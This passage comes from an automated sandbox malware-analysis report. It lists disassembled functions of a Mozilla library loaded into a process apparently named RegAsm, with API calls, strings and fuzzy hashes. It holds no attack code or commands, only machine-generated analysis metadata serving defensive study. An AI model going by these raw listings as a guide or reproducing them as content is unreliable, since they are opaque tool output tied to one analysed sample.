                                                                                                                                                        • Instruction Fuzzy Hash: 8B51E171A057119FD714CF29C09465AB7E1EF8A304F648A2EE59AC7B84D774E800CFAA
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __aulldiv
                                                                                                                                                        • String ID: -%llu$.$profiler-paused
                                                                                                                                                        • API String ID: 3732870572-2661126502
                                                                                                                                                        • Opcode ID: 6141cc5d4aa306634c1a3fb1256876be7e94da086a4af53582ab490144020324
                                                                                                                                                        • Instruction ID: d1ec871751c192ae5b2b79bcd630f56bf4e8705052d913d0b7b66cb5dae4bc12
                                                                                                                                                        • Opcode Fuzzy Hash: 6141cc5d4aa306634c1a3fb1256876be7e94da086a4af53582ab490144020324
                                                                                                                                                        • Instruction Fuzzy Hash: 92417971E046149FCB08CF39D88116EB7F5EF86344F608A7DE8496BB81EB7088248799
                                                                                                                                                        APIs
                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C654721
                                                                                                                                                          • Part of subcall function 6C604410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C643EBD,00000017,?,00000000,?,6C643EBD,?,?,6C6042D2), ref: 6C604444
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __aulldiv__stdio_common_vsprintf
                                                                                                                                                        • String ID: -%llu$.$profiler-paused
                                                                                                                                                        • API String ID: 680628322-2661126502
                                                                                                                                                        • Opcode ID: 666581cd7572c423d0043e56fac8fcedf06c33707c9fb10d1702b2ed6f829c97
                                                                                                                                                        • Instruction ID: fb58bca4b24fca914ccfc38b5c52afcedd4bb5fb0a77e77c410fb1636f95b286
                                                                                                                                                        • Opcode Fuzzy Hash: 666581cd7572c423d0043e56fac8fcedf06c33707c9fb10d1702b2ed6f829c97
                                                                                                                                                        • Instruction Fuzzy Hash: 58313971F042185FCB0CCF6DD8816ADBBE6DB89314F64457EE8059B741E7B098148B98
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C604290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C643EBD,6C643EBD,00000000), ref: 6C6042A9
                                                                                                                                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C65B127), ref: 6C65B463
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C65B4C9
                                                                                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C65B4E4
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _getpidstrlenstrncmptolower
                                                                                                                                                        • String ID: pid:
                                                                                                                                                        • API String ID: 1720406129-3403741246
                                                                                                                                                        • Opcode ID: b9e61665f701acecdcf9460d235a89296e9c8d0e6cbbaf11063e82f221e9d305
                                                                                                                                                        • Instruction ID: 8fba2bebcd48a43d6d78e7757818f979176525932cad394c5923cee92284dc78
                                                                                                                                                        • Opcode Fuzzy Hash: b9e61665f701acecdcf9460d235a89296e9c8d0e6cbbaf11063e82f221e9d305
                                                                                                                                                        • Instruction Fuzzy Hash: F8314A31A01208DFDB20DFA9D880AEEB7B5FF85308FA40529D85167B44D731E865CBE9
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64E577
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64E584
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64E5DE
                                                                                                                                                        • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C64E8A6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                                                                                        • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                                                                                        • API String ID: 1483687287-53385798
                                                                                                                                                        • Opcode ID: fc616c2f868cfbea320aa6623554e27fb383d0bf3b36e6199694fc7ba6e84e51
                                                                                                                                                        • Instruction ID: 996b92691461b326a0fc17fd2a5d01441f7b24a0f0f10136bafe02153d3445d4
                                                                                                                                                        • Opcode Fuzzy Hash: fc616c2f868cfbea320aa6623554e27fb383d0bf3b36e6199694fc7ba6e84e51
                                                                                                                                                        • Instruction Fuzzy Hash: 9211A131606254EFCB00DF16C888A69BBB4FFCA368F104A1AE85547651C770A805CFFE
                                                                                                                                                        APIs
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C650CD5
                                                                                                                                                          • Part of subcall function 6C63F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C63F9A7
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C650D40
                                                                                                                                                        • free.MOZGLUE ref: 6C650DCB
                                                                                                                                                          • Part of subcall function 6C625E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C625EDB
                                                                                                                                                          • Part of subcall function 6C625E90: memset.VCRUNTIME140(ewfl,000000E5,?), ref: 6C625F27
                                                                                                                                                          • Part of subcall function 6C625E90: LeaveCriticalSection.KERNEL32(?), ref: 6C625FB2
                                                                                                                                                        • free.MOZGLUE ref: 6C650DDD
                                                                                                                                                        • free.MOZGLUE ref: 6C650DF2
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4069420150-0
                                                                                                                                                        • Opcode ID: 04bef2330bdd769e759c27654f639f3e151f05aa89613f6eeef37a7108a25ebc
                                                                                                                                                        • Instruction ID: 30e9073084b3f18b1ed365ce119ab274e4f1009c8bbf8a557e0e2ac6d5ffda19
                                                                                                                                                        • Opcode Fuzzy Hash: 04bef2330bdd769e759c27654f639f3e151f05aa89613f6eeef37a7108a25ebc
                                                                                                                                                        • Instruction Fuzzy Hash: 574126759097809BD320CF29C0807AAFBE5BFC9718F618A2EE8D887750D770D455CB9A
                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C64DA31,00100000,?,?,00000000,?), ref: 6C65CDA4
                                                                                                                                                          • Part of subcall function 6C61CA10: malloc.MOZGLUE(?), ref: 6C61CA26
                                                                                                                                                          • Part of subcall function 6C65D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C65CDBA,00100000,?,00000000,?,6C64DA31,00100000,?,?,00000000,?), ref: 6C65D158
                                                                                                                                                          • Part of subcall function 6C65D130: InitializeConditionVariable.KERNEL32(00000098,?,6C65CDBA,00100000,?,00000000,?,6C64DA31,00100000,?,?,00000000,?), ref: 6C65D177
                                                                                                                                                        • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C64DA31,00100000,?,?,00000000,?), ref: 6C65CDC4
                                                                                                                                                          • Part of subcall function 6C657480: ReleaseSRWLockExclusive.KERNEL32(?,6C6615FC,?,?,?,?,6C6615FC,?), ref: 6C6574EB
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C64DA31,00100000,?,?,00000000,?), ref: 6C65CECC
                                                                                                                                                          • Part of subcall function 6C61CA10: mozalloc_abort.MOZGLUE(?), ref: 6C61CAA2
                                                                                                                                                          • Part of subcall function 6C64CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C65CEEA,?,?,?,?,00000000,?,6C64DA31,00100000,?,?,00000000), ref: 6C64CB57
                                                                                                                                                          • Part of subcall function 6C64CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C64CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C65CEEA,?,?), ref: 6C64CBAF
                                                                                                                                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C64DA31,00100000,?,?,00000000,?), ref: 6C65D058
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 861561044-0
                                                                                                                                                        • Opcode ID: 191d814ade7243e4927add602529be419aba0e09f056ad875c45839257a497a1
                                                                                                                                                        • Instruction ID: aadda8a29249f98c0a0da1e1f6629ff8f943e4713d0a0fc3ed1eb3ac6ae98881
                                                                                                                                                        • Opcode Fuzzy Hash: 191d814ade7243e4927add602529be419aba0e09f056ad875c45839257a497a1
                                                                                                                                                        • Instruction Fuzzy Hash: A6D17F71A04B069FD708CF28C580B99F7E1BF89308F51862DD8598B752EB31A9A5CBC5
                                                                                                                                                        APIs
                                                                                                                                                        • GetTickCount64.KERNEL32 ref: 6C625D40
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68F688), ref: 6C625D67
                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C625DB4
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68F688), ref: 6C625DED
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 557828605-0
                                                                                                                                                        • Opcode ID: 04d3b1c65574b2da2ed8a31f73b62a2a7cb2934fc21ce9533deceee593f468f5
                                                                                                                                                        • Instruction ID: d1e97452b9950bf0d8876f3acf0b0509223b255072ff837191035bd3c3b5512e
                                                                                                                                                        • Opcode Fuzzy Hash: 04d3b1c65574b2da2ed8a31f73b62a2a7cb2934fc21ce9533deceee593f468f5
                                                                                                                                                        • Instruction Fuzzy Hash: A5519F71E011299FCF08CFA9C894AAEBBF1FB86304F198A19C811B7754C7346945CFA9
                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C60CEBD
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C60CEF5
                                                                                                                                                        • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C60CF4E
                                                                                                                                                        Strings
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$memset
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 438689982-4108050209
                                                                                                                                                        • Opcode ID: 69fe0ab8e535d75bafa102ee15a38e290033301ae0bef975dc7718ee1135a52b
                                                                                                                                                        • Instruction ID: cf2d5d59b6014886570fbafc15987747480079d711b56b60bc136fc94af99e0c
                                                                                                                                                        • Opcode Fuzzy Hash: 69fe0ab8e535d75bafa102ee15a38e290033301ae0bef975dc7718ee1135a52b
                                                                                                                                                        • Instruction Fuzzy Hash: 72512475A002169FCB04CF18C490AAABBB5EF99300F29859DD85A5F351D331ED06CBE1
                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C6482BC,?,?), ref: 6C64649B
                                                                                                                                                          • Part of subcall function 6C61CA10: malloc.MOZGLUE(?), ref: 6C61CA26
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6464A9
                                                                                                                                                          • Part of subcall function 6C63FA80: GetCurrentThreadId.KERNEL32 ref: 6C63FA8D
                                                                                                                                                          • Part of subcall function 6C63FA80: AcquireSRWLockExclusive.KERNEL32(6C68F448), ref: 6C63FA99
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C64653F
                                                                                                                                                        • free.MOZGLUE(?), ref: 6C64655A
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3596744550-0
                                                                                                                                                        • Opcode ID: 69a2c869c14be11f2bf9a3f150791e8bafb8a90b517303083b89045c2fcc1eec
                                                                                                                                                        • Instruction ID: fd4ca506fffde02c85d8a7e069dda97a48b36a1019d5d70adac8b4235627fe52
                                                                                                                                                        • Opcode Fuzzy Hash: 69a2c869c14be11f2bf9a3f150791e8bafb8a90b517303083b89045c2fcc1eec
                                                                                                                                                        • Instruction Fuzzy Hash: 583181B5A04315AFD704CF14D88469EBBF4BF89314F10842DE85A87741D730E919CB9A
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C61B4F5
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C61B502
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C61B542
                                                                                                                                                        • free.MOZGLUE(?), ref: 6C61B578
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2047719359-0
                                                                                                                                                        APIs
                                                                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C60F20E,?), ref: 6C643DF5
                                                                                                                                                        • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C60F20E,00000000,?), ref: 6C643DFC
                                                                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C643E06
                                                                                                                                                        • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C643E0E
                                                                                                                                                          • Part of subcall function 6C63CC00: GetCurrentProcess.KERNEL32(?,?,6C6031A7), ref: 6C63CC0D
                                                                                                                                                          • Part of subcall function 6C63CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C6031A7), ref: 6C63CC16
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2787204188-0
                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C6585D3
                                                                                                                                                          • Part of subcall function 6C61CA10: malloc.MOZGLUE(?), ref: 6C61CA26
                                                                                                                                                        • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C658725
                                                                                                                                                        Strings
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                                                                        • String ID: map/set<T> too long
                                                                                                                                                        • API String ID: 3720097785-1285458680
                                                                                                                                                        APIs
                                                                                                                                                        • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C60BDEB
                                                                                                                                                        • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C60BE8F
                                                                                                                                                        Strings
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 2811501404-4108050209
                                                                                                                                                        APIs
                                                                                                                                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C643D19
                                                                                                                                                        • mozalloc_abort.MOZGLUE(?), ref: 6C643D6C
                                                                                                                                                        Strings
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _errnomozalloc_abort
                                                                                                                                                        • String ID: d
                                                                                                                                                        • API String ID: 3471241338-2564639436
                                                                                                                                                        APIs
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C666E22
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C666E3F
                                                                                                                                                        Strings
                                                                                                                                                        • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C666E1D
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Init_thread_footergetenv
                                                                                                                                                        • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                                                                        • API String ID: 1472356752-1153589363
                                                                                                                                                        APIs
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C619EEF
                                                                                                                                                        Strings
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                        • String ID: Infinity$NaN
                                                                                                                                                        • API String ID: 1385522511-4285296124
                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(0Kdl,?,6C644B30,80000000,?,6C644AB7,?,6C6043CF,?,6C6042D2), ref: 6C616C42
                                                                                                                                                          • Part of subcall function 6C61CA10: malloc.MOZGLUE(?), ref: 6C61CA26
                                                                                                                                                        • moz_xmalloc.MOZGLUE(0Kdl,?,6C644B30,80000000,?,6C644AB7,?,6C6043CF,?,6C6042D2), ref: 6C616C58
                                                                                                                                                        Strings
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: moz_xmalloc$malloc
                                                                                                                                                        • String ID: 0Kdl
                                                                                                                                                        • API String ID: 1967447596-3895838284
                                                                                                                                                        • Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                                                                                                        • Instruction ID: be341555b8e8dcc6f9ef5b23ae930268ec48b2bfcd91c26486f264fcaf835f02
                                                                                                                                                        • Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                                                                                                        • Instruction Fuzzy Hash: 0AE026F6B5C1001A9B08987C9C0956E71C8CB153AA7044A35E823C2FC8FA94E480805D
                                                                                                                                                        APIs
                                                                                                                                                        • DisableThreadLibraryCalls.KERNEL32(?), ref: 6C61BEE3
                                                                                                                                                        • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C61BEF5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$CallsDisableLoadThread
                                                                                                                                                        • String ID: cryptbase.dll
                                                                                                                                                        • API String ID: 4137859361-1262567842
                                                                                                                                                        • Opcode ID: ce44b48fd0aff60da0ceece0ff67b752f658f63a80fcf2f7f3b1df7e282e772d
                                                                                                                                                        • Instruction ID: 8f6a7aba4640631cd672e7b7e79dabbc44c819836efffb170fe0322c2e0d9e2b
                                                                                                                                                        • Opcode Fuzzy Hash: ce44b48fd0aff60da0ceece0ff67b752f658f63a80fcf2f7f3b1df7e282e772d
                                                                                                                                                        • Instruction Fuzzy Hash: 32D0A731189208FAC7006A558C0DB293B789786396F10C020F30554D52C7B09412CF7C
                                                                                                                                                        APIs
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C65B2C9,?,?,?,6C65B127,?,?,?,?,?,?,?,?,?,6C65AE52), ref: 6C65B628
                                                                                                                                                          • Part of subcall function 6C6590E0: free.MOZGLUE(?,00000000,?,?,6C65DEDB), ref: 6C6590FF
                                                                                                                                                          • Part of subcall function 6C6590E0: free.MOZGLUE(?,00000000,?,?,6C65DEDB), ref: 6C659108
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C65B2C9,?,?,?,6C65B127,?,?,?,?,?,?,?,?,?,6C65AE52), ref: 6C65B67D
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C65B2C9,?,?,?,6C65B127,?,?,?,?,?,?,?,?,?,6C65AE52), ref: 6C65B708
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C65B127,?,?,?,?,?,?,?,?), ref: 6C65B74D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: freemalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3061335427-0
                                                                                                                                                        • Opcode ID: 29a63ab75aa782e076da42a6f61960a4b4f76d39b71335fc5e5d0d9ea78f516d
                                                                                                                                                        • Instruction ID: 7e2c86b142a8e541a5ca5b083dbcd57daed4287f6d1d3ed898f254c53a160210
                                                                                                                                                        • Opcode Fuzzy Hash: 29a63ab75aa782e076da42a6f61960a4b4f76d39b71335fc5e5d0d9ea78f516d
                                                                                                                                                        • Instruction Fuzzy Hash: 0051C271A053168FDB14CF18C98076EB7B5FFC5308FA5852DC85AAB750D731A824CBA9
                                                                                                                                                        APIs
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C656EAB
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C656EFA
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C656F1E
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C656F5C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: malloc$freememcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4259248891-0
                                                                                                                                                        • Opcode ID: 2493e3de538d034caac554a151c00adaa503ed93abd79d7c0caa9f8ae3e67d66
                                                                                                                                                        • Instruction ID: 9994dba90d33ab39a1498e214b5c6e8466ebd44ed83ebe8c7c8a58b119f5c957
                                                                                                                                                        • Opcode Fuzzy Hash: 2493e3de538d034caac554a151c00adaa503ed93abd79d7c0caa9f8ae3e67d66
                                                                                                                                                        • Instruction Fuzzy Hash: 54310971B115068FDB14CF2CC9806AE73FAEB85344FA04239D416D7751EB32E565C7A4
                                                                                                                                                        APIs
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C610A4D), ref: 6C66B5EA
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C610A4D), ref: 6C66B623
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C610A4D), ref: 6C66B66C
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C610A4D), ref: 6C66B67F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: malloc$free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1480856625-0
                                                                                                                                                        • Opcode ID: f011718a437416094a6b15622ea99ad5b098f65e1cab980bee52db7062c3dacd
                                                                                                                                                        • Instruction ID: 90bb080ca070a28e43e4950367c055c7f829fd1a9ff6e648e32620bc5f44868a
                                                                                                                                                        • Opcode Fuzzy Hash: f011718a437416094a6b15622ea99ad5b098f65e1cab980bee52db7062c3dacd
                                                                                                                                                        • Instruction Fuzzy Hash: 8831F671A01216CFDB10DF5AC88465AB7B5FFC1304F168629D806EBA01DB31E915CBE6
                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C63F611
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C63F623
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C63F652
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C63F668
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                                        • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                        • Instruction ID: 24d8f337ccd67e1b724b0e1a658a3a7f9883f9fc6591ec767f9d2d1b08e6bc20
                                                                                                                                                        • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                        • Instruction Fuzzy Hash: 5D316171B00224AFD724CF1DCCC0A9B77B5EF94354F149979FA4A8BB04D632E9448BA9
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
